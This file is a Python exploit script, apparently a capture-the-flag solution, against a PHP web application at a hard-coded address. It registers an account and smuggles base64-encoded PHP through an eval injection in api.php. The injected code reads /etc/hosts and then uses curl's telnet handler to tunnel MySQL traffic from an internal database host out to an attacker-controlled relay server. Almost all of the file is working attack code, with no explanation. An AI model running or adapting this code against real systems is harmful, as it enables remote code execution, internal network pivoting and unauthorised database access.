exploit.py

import requests
import json
import base64

host = "47.89.249.223"
port = 49275
remote_protocol_handler = "[remote_ip]"
remote_protocol_handler_port = "[remote_port]"

php_tmpl = """
$message_to_be_sent = ""; // make sure message_to_be_sent do not contain single \\xff
function write_cb($ch,$server_message) {
    // receive server response
    echo "Received Server Message: ".$server_message."\\n";
    global $message_to_be_sent;
    $newch = curl_init();
    curl_setopt($newch, CURLOPT_URL, "http://{remote_server}:{remote_port}/");
    curl_setopt($newch, CURLOPT_POST, true);
    curl_setopt($newch, CURLOPT_HTTPHEADER, ["Content-Type: application/octet-stream"]);
    curl_setopt($newch, CURLOPT_POSTFIELDS, $server_message);
    curl_setopt($newch, CURLOPT_RETURNTRANSFER, true);
    $resp = curl_exec($newch);
    $message_to_be_sent = base64_decode($resp);
    curl_close($newch);
    return strlen($server_message);
}
function read_cb($ch, $fd, $length)
{
    global $message_to_be_sent;
    if($message_to_be_sent != ""){
        echo "Sending Client Message: ". $message_to_be_sent."\\n";
        $ret = $message_to_be_sent;
        $message_to_be_sent = "";
        return $ret;
    } else {
        return NULL;
    }
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "telnet://{db_server}:3306/");
curl_setopt($ch, CURLOPT_WRITEFUNCTION, "write_cb");
curl_setopt($ch, CURLOPT_READFUNCTION, "read_cb" );
curl_setopt($ch, CURLOPT_TELNETOPTIONS, []);
$mh = curl_multi_init();
curl_multi_add_handle($mh,$ch);
$status = curl_multi_exec($mh, $active);
"""

s = requests.Session()
target = "http://%s:%d/" % (host, port)
def register():
    global s
    data = {
        "username": "test123456",
        "password": "test123456"
    }
    r = s.post(target + "register.php", data=data)

def login():
    global s
    data = {
        "username": "test123456",
        "password": "test123456"
    }
    r = s.post(target + "login.php", data=data)
def eval(code):
    global s
    code = "***/" + code + "//"
    code = base64.b64encode(code.encode())
    data = {
        "URL": 'http;Lyo;$bd = base64_decode($this->getURL()); $bd = $bd[5].$bd[6].$bd[7].$bd; eval(base64_decode($bd));//\\");} public function test123456(){ eval(base64_decode(this->getURL())); var ch = curl_init();//%s' % code.decode()
    }
    r = s.post(target + "api.php", data=data)
    rj = json.loads(r.text)
    if rj["status"] == "success":
        mess = base64.b64decode(rj["message"])
        return mess
    else:
        return None
def getdbhost():
    host = eval("include '/etc/hosts';")
    print(host)

register()
login()
getdbhost()
#host: 170.20.0.3, db: 172.20.0.2
php_code = php_tmpl.replace("{db_server}", "172.20.0.2").replace("{remote_server}", remote_protocol_handler).replace("{remote_port}", remote_protocol_handler_port)
print(eval(php_code))